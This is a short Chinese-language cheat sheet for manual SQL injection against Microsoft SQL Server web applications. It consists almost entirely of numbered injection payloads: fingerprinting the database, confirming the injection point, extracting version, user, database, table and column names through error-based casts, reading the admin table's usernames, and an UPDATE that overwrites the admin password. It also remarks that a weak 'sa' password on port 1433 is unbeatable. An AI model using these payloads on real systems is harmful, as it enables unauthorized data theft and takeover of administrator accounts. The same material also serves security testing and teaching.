手工注入MSSQL:

字典表，函数多

1.判断数据库类型

构造出错信息 and admin>0

2.判断注入点：

and 1=1

and 1=2

3.判断数据库的版本号：

and @@version>0

4.查看当前连接数据库用户名：

and user>o

dbo=sa mssql 1433端口配上弱口令无敌

5.查看当前连接数据库名：

and db_name()>0可能后来有些版本没了此函数

6.查看其它数据库：dbid=6,7,8

and (select name from master.dbo.sysdatabases where  dbid=6)>1

7.判断表名：

and (select top 1 name from sysobjects where xtype='u' and status>0)>0

8.判断其他表：name not in ('xxx','xx')

9.判断列：

and (select Top 1 col_name(object_id('admin'),1)from sysobjects)>0

10.判断值：

and (select username from admin)>0

11.修改口令

update  article.dbo.admin set password='a123456' where username='admin';--

--:注释符

php注释符#